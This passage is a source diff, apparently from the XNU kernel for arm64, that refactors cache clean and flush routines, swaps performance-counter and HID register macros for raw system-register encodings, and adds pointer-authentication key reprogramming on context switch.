-       b.cc    L_cpcd_dcacheway                                        // loop
-
-       HAS_L2_CACHE x0
-       cbz             x0, L_cpcd_skipl2dcache
-       mov             x0, #1
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dsb             sy
-       mov             x0, #2
-L_cpcd_l2dcacheway:
-L_cpcd_l2dcacheline:
-       dc              csw, x0                                                         // clean dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_cpcd_l2dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_cpcd_l2dcacheway                                      // loop
-L_cpcd_skipl2dcache:
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #24, #3 // extract CLIDR_EL1.LoC
+       DCACHE_SET_WAY csw
 #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
-       dsb             sy
-       ret
 
 /*
  * void CleanPoU_Dcache(void)
@@ -197,25 +203,14 @@ L_cpcd_skipl2dcache:
        .globl EXT(CleanPoU_Dcache)
 LEXT(CleanPoU_Dcache)
 #if defined(APPLE_ARM64_ARCH_FAMILY)
-       /* "Fully Coherent." */
-#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_cpud_dcacheway:
-L_cpud_dcacheline:
-       dc              csw, x0                                                         // clean dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_cpud_dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_cpud_dcacheway                                        // loop
-       #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
        dsb sy
        ret
+       /* "Fully Coherent." */
+#else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #21, 3  // extract CLIDR_EL1.LoUIS
+       DCACHE_SET_WAY csw
+#endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
 
 /*
  *     void CleanPoU_DcacheRegion(vm_offset_t va, unsigned length)
@@ -253,24 +248,30 @@ L_cpudr_loop:
        .text
        .align 2
 LEXT(CleanPoC_DcacheRegion_internal)
-       mov             x9, #((1<<MMU_CLINE)-1)
+       mov x10, #(MMU_CLINE)
+
+       /* Stash the cache line size in bytes, (1 << MMU_CLINE), in x11 for easy access. */
+       mov x11, #1
+       lsl x11, x11, x10
+
+       sub             x9, x11, #1
        and             x2, x0, x9
        bic             x0, x0, x9                                                      // Cached aligned
        add             x1, x1, x2
        sub             x1, x1, #1
-       lsr             x1, x1, #MMU_CLINE                                      // Set cache line counter
+       lsr             x1, x1, x10                                                     // Set cache line counter
        dsb             sy      
 L_cpcdr_loop:
 #if defined(APPLE_ARM64_ARCH_FAMILY)
        // It may be tempting to clean the cache (dc cvac), 
        // but see Cyclone UM 5.3.8.3 -- it's always a NOP on Cyclone.
        //
-       // Clean & Invalidate, however, will work as long as HID4.DisDCMvaOps isn't set.
+       // Clean & Invalidate, however, will work as long as S3_0_C15_C4_0.DisDCMvaOps isn't set.
        dc              civac, x0                                                       // Clean & Invalidate dcache line to PoC
 #else
        dc              cvac, x0                                                        // Clean dcache line to PoC
 #endif
-       add             x0, x0, #(1<<MMU_CLINE)                         // Get next cache aligned addr
+       add             x0, x0, x11                                                     // Get next cache aligned addr
        subs    x1, x1, #1                                                      // Decrementer cache line counter
        b.pl    L_cpcdr_loop                                            // Loop in counter not null
        dsb             sy
@@ -302,14 +303,14 @@ LEXT(CleanPoC_DcacheRegion_Force_nopreempt)
        PUSH_FRAME
        isb             sy
        ARM64_IS_PCORE x15
-       ARM64_READ_EP_SPR x15, x14, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_READ_EP_SPR x15, x14, S3_0_C15_C4_1, S3_0_C15_C4_0
        and             x14, x14, (~ARM64_REG_HID4_DisDcMVAOps)
-       ARM64_WRITE_EP_SPR x15, x14, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_WRITE_EP_SPR x15, x14, S3_0_C15_C4_1, S3_0_C15_C4_0
        isb             sy
        bl              EXT(CleanPoC_DcacheRegion_internal)
        isb             sy
        orr             x14, x14, ARM64_REG_HID4_DisDcMVAOps
-       ARM64_WRITE_EP_SPR x15, x14, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_WRITE_EP_SPR x15, x14, S3_0_C15_C4_1, S3_0_C15_C4_0
        isb             sy
        POP_FRAME
        ARM64_STACK_EPILOG
@@ -351,43 +352,26 @@ LEXT(CleanPoC_DcacheRegion_Force)
        .globl EXT(FlushPoC_Dcache)
 LEXT(FlushPoC_Dcache)
 #if defined(APPLE_ARM64_ARCH_FAMILY)
+       dsb sy
+       ret
        /* "Fully Coherent." */
 #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_fpcd_dcacheway:
-L_fpcd_dcacheline:
-       dc              cisw, x0                                                        // clean invalidate dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_fpcd_dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_fpcd_dcacheway                                        // loop
-
-       HAS_L2_CACHE x0
-       cbz             x0, L_fpcd_skipl2dcache
-       dsb             sy
-       mov             x0, #1
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       mov             x0, #2
-L_fpcd_l2dcacheway:
-L_fpcd_l2dcacheline:
-       dc              cisw, x0                                                        // clean invalide dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_fpcd_l2dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_fpcd_l2dcacheway                                      // loop
-L_fpcd_skipl2dcache:
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #24, #3 // extract CLIDR_EL1.LoC
+       DCACHE_SET_WAY cisw
 #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
-       dsb             sy
-       ret
+
+/*
+ *     void Flush_Dcache(void)
+ * 
+ *             Clean and invalidate D-cache, all levels
+ */
+       .text
+       .align 2
+       .globl EXT(Flush_Dcache)
+LEXT(Flush_Dcache)
+       mov x0, #6 // Maximum allowable caching level (0-based)
+       DCACHE_SET_WAY cisw 
 
 /*
  * void FlushPoU_Dcache(void)
@@ -399,25 +383,14 @@ L_fpcd_skipl2dcache:
        .globl EXT(FlushPoU_Dcache)
 LEXT(FlushPoU_Dcache)
 #if defined(APPLE_ARM64_ARCH_FAMILY)
+       dsb sy
+       ret
        /* "Fully Coherent." */
 #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_fpud_way:
-L_fpud_line:
-       dc              cisw, x0                                                        // clean invalidate dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_fpud_line
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
-       b.cc    L_fpud_way                                                      // loop
+       mrs             x0, CLIDR_EL1
+       ubfx            x0, x0, #21, 3  // extract CLIDR_EL1.LoUIS
+       DCACHE_SET_WAY  cisw
 #endif /* defined(APPLE_ARM64_ARCH_FAMILY) */
-       dsb             sy
-       ret
 
 /*
  *     void FlushPoC_DcacheRegion(vm_offset_t va, unsigned length)
index c7181aa5064bfd2ad629c9346d87b757c5a00d55..23e3d2512f46449ebc2c1663166c70cffacf224b 100644 (file)
@@ -49,8 +49,6 @@ extern int _copyout_atomic64(uint64_t u64, const char *dst);
 
 extern int copyoutstr_prevalidate(const void *kaddr, user_addr_t uaddr, size_t len);
 
-extern pmap_t kernel_pmap;
-
 extern const vm_map_address_t physmap_base;
 extern const vm_map_address_t physmap_end;
 
@@ -182,7 +180,7 @@ copy_validate(const user_addr_t user_addr, uintptr_t kernel_addr,
                         * Size of elements in the permanent zone is not saved as a part of the
                         * zone's info
                         */
-                       if (__improbable(src_zone && !src_zone->permanent &&
+                       if (__improbable(src_zone && !src_zone->z_permanent &&
                            kernel_buf_size < nbytes)) {
                                panic("copyio_preflight: kernel buffer 0x%lx has size %lu < nbytes %lu",
                                    kernel_addr, kernel_buf_size, nbytes);
index 8ba394661040fa4bfac94b395999d3784358bc74..1e0e214e66ec3bec6f95fe6a9783262a24d1c85b 100644 (file)
 #endif
 
 
+#if CSWITCH_ROP_KEYS
+       ldr             \new_key, [\thread, TH_ROP_PID]
+       REPROGRAM_ROP_KEYS      Lskip_rop_keys_\@, \new_key, \cpudatap, \tmp_key
+       mov             \wsync, #1
+Lskip_rop_keys_\@:
+#endif /* CSWITCH_ROP_KEYS */
+
+#if CSWITCH_JOP_KEYS
+       ldr             \new_key, [\thread, TH_JOP_PID]
+       REPROGRAM_JOP_KEYS      Lskip_jop_keys_\@, \new_key, \cpudatap, \tmp_key
+       mov             \wsync, #1
+Lskip_jop_keys_\@:
+#endif /* CSWITCH_JOP_KEYS */
 
        cbz             \wsync, 1f
        isb     sy
index 18fd6df99d8794e091b363b5c7ef4b4cd18ce3f4..411da56309980bfb5e9a83ef9821698ab30090ff 100644 (file)
@@ -26,7 +26,6 @@
  * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
  */
 
-#include <arm64/pac_asm.h>
 #include <pexpert/arm64/board_config.h>
 #include "assym.s"
 
index 2ed851c12fbaad7b081b6825733fd5e9d4f5317c..2c985f2f59d7d20f319a4a67a73a84cd55b1ac4a 100644 (file)
@@ -97,6 +97,9 @@ void
 pal_hib_patchup(pal_hib_ctx_t *ctx)
 {
 
+       /* Reinit the ppl hib lock, as it was saved to the hibernation image while held. */
+       ppl_hib_lock_reinit();
+
        // DRAM pages are captured from a PPL context, so here we restore all cpu_data structures to a non-PPL context
        for (int i = 0; i < MAX_CPUS; i++) {
                pmap_cpu_data_array[i].cpu_data.ppl_state = PPL_STATE_KERNEL;
index 973723ffc192530c50c50d092fe7bec544087469..d8e7326995339cb39763db59e7189c7ae92732c5 100644 (file)
@@ -141,37 +141,6 @@ void kpc_pmi_handler(unsigned int ctr);
 #define PMESR_EVT_ENCODE(EVT, PMC, OFF) \
        (((EVT) & PMESR_PMC_MASK) << PMESR_SHIFT(PMC, OFF))
 
-/* system registers in the CPMU */
-
-#define SREG_PMCR0  "S3_1_c15_c0_0"
-#define SREG_PMCR1  "S3_1_c15_c1_0"
-#define SREG_PMCR2  "S3_1_c15_c2_0"
-#define SREG_PMCR3  "S3_1_c15_c3_0"
-#define SREG_PMCR4  "S3_1_c15_c4_0"
-#define SREG_PMESR0 "S3_1_c15_c5_0"
-#define SREG_PMESR1 "S3_1_c15_c6_0"
-#define SREG_PMSR   "S3_1_c15_c13_0"
-#define SREG_OPMAT0 "S3_1_c15_c7_0"
-#define SREG_OPMAT1 "S3_1_c15_c8_0"
-#define SREG_OPMSK0 "S3_1_c15_c9_0"
-#define SREG_OPMSK1 "S3_1_c15_c10_0"
-
-#define SREG_PMC0 "S3_2_c15_c0_0"
-#define SREG_PMC1 "S3_2_c15_c1_0"
-#define SREG_PMC2 "S3_2_c15_c2_0"
-#define SREG_PMC3 "S3_2_c15_c3_0"
-#define SREG_PMC4 "S3_2_c15_c4_0"
-#define SREG_PMC5 "S3_2_c15_c5_0"
-#define SREG_PMC6 "S3_2_c15_c6_0"
-#define SREG_PMC7 "S3_2_c15_c7_0"
-#define SREG_PMC8 "S3_2_c15_c9_0"
-#define SREG_PMC9 "S3_2_c15_c10_0"
-
-#define SREG_PMMMAP   "S3_2_c15_c15_0"
-#define SREG_PMTRHLD2 "S3_2_c15_c14_0"
-#define SREG_PMTRHLD4 "S3_2_c15_c13_0"
-#define SREG_PMTRHLD6 "S3_2_c15_c12_0"
-
 /*
  * The low 8 bits of a configuration words select the event to program on
  * PMESR{0,1}. Bits 16-19 are mapped to PMCR1 bits.
@@ -318,26 +287,26 @@ static void
 dump_regs(void)
 {
        uint64_t val;
-       kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR0));
-       kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR1));
-       kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR2));
-       kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR3));
-       kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMCR4));
-       kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR0));
-       kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMESR1));
-
-       kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC0));
-       kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC1));
-       kprintf("PMC2 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC2));
-       kprintf("PMC3 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC3));
-       kprintf("PMC4 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC4));
-       kprintf("PMC5 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC5));
-       kprintf("PMC6 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC6));
-       kprintf("PMC7 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC7));
+       kprintf("PMCR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C0_0"));
+       kprintf("PMCR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C1_0"));
+       kprintf("PMCR2 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C2_0"));
+       kprintf("PMCR3 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C3_0"));
+       kprintf("PMCR4 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C4_0"));
+       kprintf("PMESR0 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C5_0"));
+       kprintf("PMESR1 = 0x%" PRIx64 "\n", SREG_READ("S3_1_C15_C6_0"));
+
+       kprintf("PMC0 = 0x%" PRIx64 "\n", SREG_READ("PMC0"));
+       kprintf("PMC1 = 0x%" PRIx64 "\n", SREG_READ("PMC1"));
+       kprintf("S3_2_C15_C2_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C2_0"));
+       kprintf("S3_2_C15_C3_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C3_0"));
+       kprintf("S3_2_C15_C4_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C4_0"));
+       kprintf("S3_2_C15_C5_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C5_0"));
+       kprintf("S3_2_C15_C6_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C6_0"));
+       kprintf("S3_2_C15_C7_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C7_0"));
 
 #if (KPC_ARM64_CONFIGURABLE_COUNT > 6)
-       kprintf("PMC8 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC8));
-       kprintf("PMC9 = 0x%" PRIx64 "\n", SREG_READ(SREG_PMC9));
+       kprintf("S3_2_C15_C9_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C9_0"));
+       kprintf("S3_2_C15_C10_0 = 0x%" PRIx64 "\n", SREG_READ("S3_2_C15_C10_0"));
 #endif
 }
 #endif
@@ -348,7 +317,7 @@ enable_counter(uint32_t counter)
        uint64_t pmcr0 = 0;
        boolean_t counter_running, pmi_enabled, enabled;
 
-       pmcr0 = SREG_READ(SREG_PMCR0) | 0x3 /* leave the fixed counters enabled for monotonic */;
+       pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3 /* leave the fixed counters enabled for monotonic */;
 
        counter_running = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0;
        pmi_enabled = (pmcr0 & PMCR0_PMI_ENABLE_MASK(counter)) != 0;
@@ -358,7 +327,7 @@ enable_counter(uint32_t counter)
        if (!enabled) {
                pmcr0 |= PMCR0_PMC_ENABLE_MASK(counter);
                pmcr0 |= PMCR0_PMI_ENABLE_MASK(counter);
-               SREG_WRITE(SREG_PMCR0, pmcr0);
+               SREG_WRITE("S3_1_C15_C0_0", pmcr0);
        }
 
        return enabled;
@@ -374,12 +343,12 @@ disable_counter(uint32_t counter)
                return true;
        }
 
-       pmcr0 = SREG_READ(SREG_PMCR0) | 0x3;
+       pmcr0 = SREG_READ("S3_1_C15_C0_0") | 0x3;
        enabled = (pmcr0 & PMCR0_PMC_ENABLE_MASK(counter)) != 0;
 
        if (enabled) {
                pmcr0 &= PMCR0_PMC_DISABLE_MASK(counter);
-               SREG_WRITE(SREG_PMCR0, pmcr0);
+               SREG_WRITE("S3_1_C15_C0_0", pmcr0);
        }
 
        return enabled;
@@ -418,11 +387,11 @@ set_modes(uint32_t counter, kpc_config_t cfgword)
                bits = PMCR1_EL_ALL_ENABLE_MASK(counter);
        }
 
-       uint64_t pmcr1 = SREG_READ(SREG_PMCR1);
+       uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0");
        pmcr1 &= PMCR1_EL_ALL_DISABLE_MASK(counter);
        pmcr1 |= bits;
        pmcr1 |= 0x30303; /* monotonic compatibility */
-       SREG_WRITE(SREG_PMCR1, pmcr1);
+       SREG_WRITE("S3_1_C15_C1_0", pmcr1);
        saved_PMCR[cpuid][1] = pmcr1;
 }
 
@@ -430,17 +399,17 @@ static uint64_t
 read_counter(uint32_t counter)
 {
        switch (counter) {
-       // case 0: return SREG_READ(SREG_PMC0);
-       // case 1: return SREG_READ(SREG_PMC1);
-       case 2: return SREG_READ(SREG_PMC2);
-       case 3: return SREG_READ(SREG_PMC3);
-       case 4: return SREG_READ(SREG_PMC4);
-       case 5: return SREG_READ(SREG_PMC5);
-       case 6: return SREG_READ(SREG_PMC6);
-       case 7: return SREG_READ(SREG_PMC7);
+       // case 0: return SREG_READ("PMC0");
+       // case 1: return SREG_READ("PMC1");
+       case 2: return SREG_READ("S3_2_C15_C2_0");
+       case 3: return SREG_READ("S3_2_C15_C3_0");
+       case 4: return SREG_READ("S3_2_C15_C4_0");
+       case 5: return SREG_READ("S3_2_C15_C5_0");
+       case 6: return SREG_READ("S3_2_C15_C6_0");
+       case 7: return SREG_READ("S3_2_C15_C7_0");
 #if (KPC_ARM64_CONFIGURABLE_COUNT > 6)
-       case 8: return SREG_READ(SREG_PMC8);
-       case 9: return SREG_READ(SREG_PMC9);
+       case 8: return SREG_READ("S3_2_C15_C9_0");
+       case 9: return SREG_READ("S3_2_C15_C10_0");
 #endif
        default: return 0;
        }
@@ -450,17 +419,17 @@ static void
 write_counter(uint32_t counter, uint64_t value)
 {
        switch (counter) {
-       // case 0: SREG_WRITE(SREG_PMC0, value); break;
-       // case 1: SREG_WRITE(SREG_PMC1, value); break;
-       case 2: SREG_WRITE(SREG_PMC2, value); break;
-       case 3: SREG_WRITE(SREG_PMC3, value); break;
-       case 4: SREG_WRITE(SREG_PMC4, value); break;
-       case 5: SREG_WRITE(SREG_PMC5, value); break;
-       case 6: SREG_WRITE(SREG_PMC6, value); break;
-       case 7: SREG_WRITE(SREG_PMC7, value); break;
+       // case 0: SREG_WRITE("PMC0", value); break;
+       // case 1: SREG_WRITE("PMC1", value); break;
+       case 2: SREG_WRITE("S3_2_C15_C2_0", value); break;
+       case 3: SREG_WRITE("S3_2_C15_C3_0", value); break;
+       case 4: SREG_WRITE("S3_2_C15_C4_0", value); break;
+       case 5: SREG_WRITE("S3_2_C15_C5_0", value); break;
+       case 6: SREG_WRITE("S3_2_C15_C6_0", value); break;
+       case 7: SREG_WRITE("S3_2_C15_C7_0", value); break;
 #if (KPC_ARM64_CONFIGURABLE_COUNT > 6)
-       case 8: SREG_WRITE(SREG_PMC8, value); break;
-       case 9: SREG_WRITE(SREG_PMC9, value); break;
+       case 8: SREG_WRITE("S3_2_C15_C9_0", value); break;
+       case 9: SREG_WRITE("S3_2_C15_C10_0", value); break;
 #endif
        default: break;
        }
@@ -475,18 +444,18 @@ kpc_rawpmu_config_count(void)
 int
 kpc_get_rawpmu_config(kpc_config_t *configv)
 {
-       configv[0] = SREG_READ(SREG_PMCR2);
-       configv[1] = SREG_READ(SREG_PMCR3);
-       configv[2] = SREG_READ(SREG_PMCR4);
-       configv[3] = SREG_READ(SREG_OPMAT0);
-       configv[4] = SREG_READ(SREG_OPMAT1);
-       configv[5] = SREG_READ(SREG_OPMSK0);
-       configv[6] = SREG_READ(SREG_OPMSK1);
+       configv[0] = SREG_READ("S3_1_C15_C2_0");
+       configv[1] = SREG_READ("S3_1_C15_C3_0");
+       configv[2] = SREG_READ("S3_1_C15_C4_0");
+       configv[3] = SREG_READ("S3_1_C15_C7_0");
+       configv[4] = SREG_READ("S3_1_C15_C8_0");
+       configv[5] = SREG_READ("S3_1_C15_C9_0");
+       configv[6] = SREG_READ("S3_1_C15_C10_0");
 #if RAWPMU_CONFIG_COUNT > 7
-       configv[7] = SREG_READ(SREG_PMMMAP);
-       configv[8] = SREG_READ(SREG_PMTRHLD2);
-       configv[9] = SREG_READ(SREG_PMTRHLD4);
-       configv[10] = SREG_READ(SREG_PMTRHLD6);
+       configv[7] = SREG_READ("S3_2_C15_C15_0");
+       configv[8] = SREG_READ("S3_2_C15_C14_0");
+       configv[9] = SREG_READ("S3_2_C15_C13_0");
+       configv[10] = SREG_READ("S3_2_C15_C12_0");
 #endif
        return 0;
 }
@@ -494,18 +463,18 @@ kpc_get_rawpmu_config(kpc_config_t *configv)
 static int
 kpc_set_rawpmu_config(kpc_config_t *configv)
 {
-       SREG_WRITE(SREG_PMCR2, configv[0]);
-       SREG_WRITE(SREG_PMCR3, configv[1]);
-       SREG_WRITE(SREG_PMCR4, configv[2]);
-       SREG_WRITE(SREG_OPMAT0, configv[3]);
-       SREG_WRITE(SREG_OPMAT1, configv[4]);
-       SREG_WRITE(SREG_OPMSK0, configv[5]);
-       SREG_WRITE(SREG_OPMSK1, configv[6]);
+       SREG_WRITE("S3_1_C15_C2_0", configv[0]);
+       SREG_WRITE("S3_1_C15_C3_0", configv[1]);
+       SREG_WRITE("S3_1_C15_C4_0", configv[2]);
+       SREG_WRITE("S3_1_C15_C7_0", configv[3]);
+       SREG_WRITE("S3_1_C15_C8_0", configv[4]);
+       SREG_WRITE("S3_1_C15_C9_0", configv[5]);
+       SREG_WRITE("S3_1_C15_C10_0", configv[6]);
 #if RAWPMU_CONFIG_COUNT > 7
-       SREG_WRITE(SREG_PMMMAP, configv[7]);
-       SREG_WRITE(SREG_PMTRHLD2, configv[8]);
-       SREG_WRITE(SREG_PMTRHLD4, configv[9]);
-       SREG_WRITE(SREG_PMTRHLD6, configv[10]);
+       SREG_WRITE("S3_2_C15_C15_0", configv[7]);
+       SREG_WRITE("S3_2_C15_C14_0", configv[8]);
+       SREG_WRITE("S3_2_C15_C13_0", configv[9]);
+       SREG_WRITE("S3_2_C15_C12_0", configv[10]);
 #endif
        return 0;
 }
@@ -520,13 +489,13 @@ save_regs(void)
        assert(ml_get_interrupts_enabled() == FALSE);
 
        /* Save event selections. */
-       saved_PMESR[cpuid][0] = SREG_READ(SREG_PMESR0);
-       saved_PMESR[cpuid][1] = SREG_READ(SREG_PMESR1);
+       saved_PMESR[cpuid][0] = SREG_READ("S3_1_C15_C5_0");
+       saved_PMESR[cpuid][1] = SREG_READ("S3_1_C15_C6_0");
 
        kpc_get_rawpmu_config(saved_RAWPMU[cpuid]);
 
        /* Disable the counters. */
-       // SREG_WRITE(SREG_PMCR0, clear);
+       // SREG_WRITE("S3_1_C15_C0_0", clear);
 
        /* Finally, save state for each counter*/
        for (int i = 2; i < KPC_ARM64_PMC_COUNT; i++) {
@@ -540,8 +509,8 @@ restore_regs(void)
        int cpuid = cpu_number();
 
        /* Restore PMESR values. */
-       SREG_WRITE(SREG_PMESR0, saved_PMESR[cpuid][0]);
-       SREG_WRITE(SREG_PMESR1, saved_PMESR[cpuid][1]);
+       SREG_WRITE("S3_1_C15_C5_0", saved_PMESR[cpuid][0]);
+       SREG_WRITE("S3_1_C15_C6_0", saved_PMESR[cpuid][1]);
 
        kpc_set_rawpmu_config(saved_RAWPMU[cpuid]);
 
@@ -551,7 +520,7 @@ restore_regs(void)
        }
 
        /* Restore PMCR0/1 values (with PMCR0 last to enable). */
-       SREG_WRITE(SREG_PMCR1, saved_PMCR[cpuid][1] | 0x30303);
+       SREG_WRITE("S3_1_C15_C1_0", saved_PMCR[cpuid][1] | 0x30303);
 }
 
 static uint64_t
@@ -564,7 +533,7 @@ get_counter_config(uint32_t counter)
        case 3:         /* FALLTHROUGH */
        case 4:         /* FALLTHROUGH */
        case 5:
-               pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR0), counter, 2);
+               pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C5_0"), counter, 2);
                break;
        case 6:         /* FALLTHROUGH */
        case 7:
@@ -573,7 +542,7 @@ get_counter_config(uint32_t counter)
        case 8:         /* FALLTHROUGH */
        case 9:
 #endif
-               pmesr = PMESR_EVT_DECODE(SREG_READ(SREG_PMESR1), counter, 6);
+               pmesr = PMESR_EVT_DECODE(SREG_READ("S3_1_C15_C6_0"), counter, 6);
                break;
        default:
                pmesr = 0;
@@ -582,7 +551,7 @@ get_counter_config(uint32_t counter)
 
        kpc_config_t config = pmesr;
 
-       uint64_t pmcr1 = SREG_READ(SREG_PMCR1);
+       uint64_t pmcr1 = SREG_READ("S3_1_C15_C1_0");
 
        if (pmcr1 & PMCR1_EL0_A32_ENABLE_MASK(counter)) {
                config |= CFGWORD_EL0A32EN_MASK;
@@ -616,10 +585,10 @@ set_counter_config(uint32_t counter, uint64_t config)
        case 3:         /* FALLTHROUGH */
        case 4:         /* FALLTHROUGH */
        case 5:
-               pmesr = SREG_READ(SREG_PMESR0);
+               pmesr = SREG_READ("S3_1_C15_C5_0");
                pmesr &= PMESR_EVT_CLEAR(counter, 2);
                pmesr |= PMESR_EVT_ENCODE(config, counter, 2);
-               SREG_WRITE(SREG_PMESR0, pmesr);
+               SREG_WRITE("S3_1_C15_C5_0", pmesr);
                saved_PMESR[cpuid][0] = pmesr;
                break;
 
@@ -630,10 +599,10 @@ set_counter_config(uint32_t counter, uint64_t config)
        case 8:         /* FALLTHROUGH */
        case 9:
 #endif
-               pmesr = SREG_READ(SREG_PMESR1);
+               pmesr = SREG_READ("S3_1_C15_C6_0");
                pmesr &= PMESR_EVT_CLEAR(counter, 6);
                pmesr |= PMESR_EVT_ENCODE(config, counter, 6);
-               SREG_WRITE(SREG_PMESR1, pmesr);
+               SREG_WRITE("S3_1_C15_C6_0", pmesr);
                saved_PMESR[cpuid][1] = pmesr;
                break;
        default:
index c85b85ebc4e6cbbf98471fb0446979bce8692997..6f9bf122bfabda6a6216b6d88c35721aa1487e18 100644 (file)
@@ -27,6 +27,7 @@
  */
 
 #include <machine/asm.h>
+#include <arm64/machine_machdep.h>
 #include <arm64/machine_routines_asm.h>
 #include <arm64/proc_reg.h>
 #include <pexpert/arm64/board_config.h>
 
 .macro COMPARE_BRANCH_FUSION
 #if    defined(APPLE_ARM64_ARCH_FAMILY)
-       mrs             $1, ARM64_REG_HID1
+       mrs             $1, HID1
        .if $0 == CBF_DISABLE
        orr             $1, $1, ARM64_REG_HID1_disCmpBrFusion
        .else
        mov             $2, ARM64_REG_HID1_disCmpBrFusion
        bic             $1, $1, $2
        .endif
-       msr             ARM64_REG_HID1, $1
+       msr             HID1, $1
        .if $0 == CBF_DISABLE
        isb             sy
        .endif
@@ -938,13 +939,9 @@ no_asts:
        ARM64_IS_PCORE x12                                  // if we're not a pCORE, also do nothing
        cbz             x12, 1f
 
-#endif
-
-#if defined(APPLELIGHTNING) || defined(APPLEFIRESTORM)
-
-       mrs             x12, ARM64_REG_HID1                         // if any debug session ever existed, set forceNexL3ClkOn
+       mrs             x12, HID1                         // if any debug session ever existed, set forceNexL3ClkOn
        orr             x12, x12, ARM64_REG_HID1_forceNexL3ClkOn
-       msr             ARM64_REG_HID1, x12
+       msr             HID1, x12
 1:
 
 #endif
index c40e24e6f1cbb4c1e779fc171161def396719a43..3b616122b516a2bd9788da73046ccc1c04393c99 100644 (file)
@@ -184,15 +184,15 @@ ml_cpu_signal_type(unsigned int cpu_mpidr, uint32_t type)
        MRS(local_mpidr, "MPIDR_EL1");
        if (MPIDR_CLUSTER_ID(local_mpidr) == MPIDR_CLUSTER_ID(cpu_mpidr)) {
                uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr);
-               MSR(ARM64_REG_IPI_RR_LOCAL, x);
+               MSR("S3_5_C15_C0_0", x);
        } else {
                #define IPI_RR_TARGET_CLUSTER_SHIFT 16
                uint64_t x = type | (MPIDR_CLUSTER_ID(cpu_mpidr) << IPI_RR_TARGET_CLUSTER_SHIFT) | MPIDR_CPU_ID(cpu_mpidr);
-               MSR(ARM64_REG_IPI_RR_GLOBAL, x);
+               MSR("S3_5_C15_C0_1", x);
        }
 #else
        uint64_t x = type | MPIDR_CPU_ID(cpu_mpidr);
-       MSR(ARM64_REG_IPI_RR, x);
+       MSR("S3_5_C15_C0_1", x);
 #endif
 }
 #endif
@@ -236,7 +236,7 @@ ml_cpu_signal_deferred_adjust_timer(uint64_t nanosecs)
